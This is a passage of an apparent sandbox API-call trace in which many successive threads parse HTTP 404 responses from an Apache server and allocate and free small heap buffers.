HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 569 os_tid = 0x1864 [0322.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.658] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:07 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0322.658] GetProcessHeap () returned 0x690000 [0322.658] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0322.658] GetProcessHeap () returned 0x690000 [0322.658] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0322.658] GetProcessHeap () returned 0x690000 [0322.658] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 570 os_tid = 0x1868 [0322.911] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.911] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:08 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0322.911] GetProcessHeap () returned 0x690000 [0322.911] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0322.911] GetProcessHeap () returned 0x690000 [0322.911] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0322.911] GetProcessHeap () returned 0x690000 [0322.912] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 571 os_tid = 0x186c [0323.169] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.170] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:08 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0323.170] GetProcessHeap () returned 0x690000 [0323.170] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0323.170] GetProcessHeap () returned 0x690000 [0323.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0323.170] GetProcessHeap () returned 0x690000 [0323.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 572 os_tid = 0x1870 [0323.508] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.509] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:08 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0323.509] GetProcessHeap () returned 0x690000 [0323.509] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0323.509] GetProcessHeap () returned 0x690000 [0323.509] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0323.509] GetProcessHeap () returned 0x690000 [0323.509] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 573 os_tid = 0x1874 [0323.829] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.829] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0323.829] GetProcessHeap () returned 0x690000 [0323.829] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0323.829] GetProcessHeap () returned 0x690000 [0323.829] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0323.829] GetProcessHeap () returned 0x690000 [0323.830] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 574 os_tid = 0x1878 [0324.120] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.121] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0324.121] GetProcessHeap () returned 0x690000 [0324.121] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0324.121] GetProcessHeap () returned 0x690000 [0324.121] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0324.121] GetProcessHeap () returned 0x690000 [0324.122] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 575 os_tid = 0x187c [0324.338] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.339] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0324.339] GetProcessHeap () returned 0x690000 [0324.339] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0324.339] GetProcessHeap () returned 0x690000 [0324.339] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0324.339] GetProcessHeap () returned 0x690000 [0324.339] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 576 os_tid = 0x1880 [0324.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.570] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0324.570] GetProcessHeap () returned 0x690000 [0324.570] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0324.570] GetProcessHeap () returned 0x690000 [0324.570] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0324.570] GetProcessHeap () returned 0x690000 [0324.571] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 577 os_tid = 0x1884 [0324.777] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.778] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0324.778] GetProcessHeap () returned 0x690000 [0324.778] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0324.778] GetProcessHeap () returned 0x690000 [0324.778] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0324.778] GetProcessHeap () returned 0x690000 [0324.778] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 578 os_tid = 0x1888 [0324.980] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.980] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0324.980] GetProcessHeap () returned 0x690000 [0324.980] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0324.980] GetProcessHeap () returned 0x690000 [0324.980] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0324.980] GetProcessHeap () returned 0x690000 [0324.981] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 579 os_tid = 0x188c [0325.160] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.160] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0325.160] GetProcessHeap () returned 0x690000 [0325.160] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0325.160] GetProcessHeap () returned 0x690000 [0325.160] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0325.160] GetProcessHeap () returned 0x690000 [0325.161] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 580 os_tid = 0x1890 [0325.337] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.338] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0325.338] GetProcessHeap () returned 0x690000 [0325.338] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0325.338] GetProcessHeap () returned 0x690000 [0325.338] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0325.338] GetProcessHeap () returned 0x690000 [0325.338] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 581 os_tid = 0x1894 [0325.691] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.692] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0325.692] GetProcessHeap () returned 0x690000 [0325.692] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0325.692] GetProcessHeap () returned 0x690000 [0325.692] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0325.692] GetProcessHeap () returned 0x690000 [0325.693] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 582 os_tid = 0x1898 [0325.913] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.913] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0325.913] GetProcessHeap () returned 0x690000 [0325.914] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0325.914] GetProcessHeap () returned 0x690000 [0325.914] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0325.914] GetProcessHeap () returned 0x690000 [0325.914] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 583 os_tid = 0x189c [0326.156] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.156] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0326.157] GetProcessHeap () returned 0x690000 [0326.157] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0326.157] GetProcessHeap () returned 0x690000 [0326.157] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0326.157] GetProcessHeap () returned 0x690000 [0326.157] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 584 os_tid = 0x18a0 [0326.409] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.410] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0326.410] GetProcessHeap () returned 0x690000 [0326.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0326.410] GetProcessHeap () returned 0x690000 [0326.410] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0326.410] GetProcessHeap () returned 0x690000 [0326.410] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 585 os_tid = 0x18a4 [0326.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.642] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0326.642] GetProcessHeap () returned 0x690000 [0326.642] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0326.642] GetProcessHeap () returned 0x690000 [0326.642] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0326.642] GetProcessHeap () returned 0x690000 [0326.643] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 586 os_tid = 0x18a8 [0326.830] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.830] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:12 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0326.831] GetProcessHeap () returned 0x690000 [0326.831] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0326.831] GetProcessHeap () returned 0x690000 [0326.831] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0326.831] GetProcessHeap () returned 0x690000 [0326.831] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 587 os_tid = 0x18ac [0327.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.039] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:12 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0327.039] GetProcessHeap () returned 0x690000 [0327.039] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0327.039] GetProcessHeap () returned 0x690000 [0327.039] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0327.039] GetProcessHeap () returned 0x690000 [0327.040] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 588 os_tid = 0x18b0 [0327.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.247] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:12 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0327.247] GetProcessHeap () returned 0x690000 [0327.247] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0327.248] GetProcessHeap () returned 0x690000 [0327.248] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0327.248] GetProcessHeap () returned 0x690000 [0327.248] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 589 os_tid = 0x18b4 [0327.403] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.403] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:12 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0327.403] GetProcessHeap () returned 0x690000 [0327.403] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0327.404] GetProcessHeap () returned 0x690000 [0327.404] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0327.404] GetProcessHeap () returned 0x690000 [0327.404] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 590 os_tid = 0x18b8 [0327.672] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.672] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:12 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0327.672] GetProcessHeap () returned 0x690000 [0327.672] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0327.672] GetProcessHeap () returned 0x690000 [0327.672] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0327.672] GetProcessHeap () returned 0x690000 [0327.673] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 591 os_tid = 0x18bc [0327.941] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.942] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0327.942] GetProcessHeap () returned 0x690000 [0327.942] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0327.942] GetProcessHeap () returned 0x690000 [0327.942] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0327.942] GetProcessHeap () returned 0x690000 [0327.942] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 592 os_tid = 0x18c0 [0328.148] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.199] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0328.199] GetProcessHeap () returned 0x690000 [0328.199] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0328.199] GetProcessHeap () returned 0x690000 [0328.199] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0328.199] GetProcessHeap () returned 0x690000 [0328.200] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 593 os_tid = 0x18c4 [0328.361] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.361] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0328.361] GetProcessHeap () returned 0x690000 [0328.361] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0328.361] GetProcessHeap () returned 0x690000 [0328.361] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0328.361] GetProcessHeap () returned 0x690000 [0328.362] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 594 os_tid = 0x18c8 [0328.712] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.712] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0328.712] GetProcessHeap () returned 0x690000 [0328.712] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0328.712] GetProcessHeap () returned 0x690000 [0328.712] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0328.712] GetProcessHeap () returned 0x690000 [0328.713] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 595 os_tid = 0x18cc [0328.896] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.896] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0328.938] GetProcessHeap () returned 0x690000 [0328.938] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0328.938] GetProcessHeap () returned 0x690000 [0328.938] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0328.938] GetProcessHeap () returned 0x690000 [0328.938] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 596 os_tid = 0x18d0 [0329.411] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.412] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0329.412] GetProcessHeap () returned 0x690000 [0329.412] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0329.412] GetProcessHeap () returned 0x690000 [0329.412] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0329.412] GetProcessHeap () returned 0x690000 [0329.412] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 597 os_tid = 0x18d4 [0329.643] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.644] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0329.644] GetProcessHeap () returned 0x690000 [0329.644] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0329.644] GetProcessHeap () returned 0x690000 [0329.644] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0329.644] GetProcessHeap () returned 0x690000 [0329.645] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 598 os_tid = 0x18d8 [0329.853] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.853] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0329.853] GetProcessHeap () returned 0x690000 [0329.854] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0329.854] GetProcessHeap () returned 0x690000 [0329.854] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0329.854] GetProcessHeap () returned 0x690000 [0329.854] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 599 os_tid = 0x18dc [0330.025] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.025] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0330.025] GetProcessHeap () returned 0x690000 [0330.025] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0330.025] GetProcessHeap () returned 0x690000 [0330.025] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: 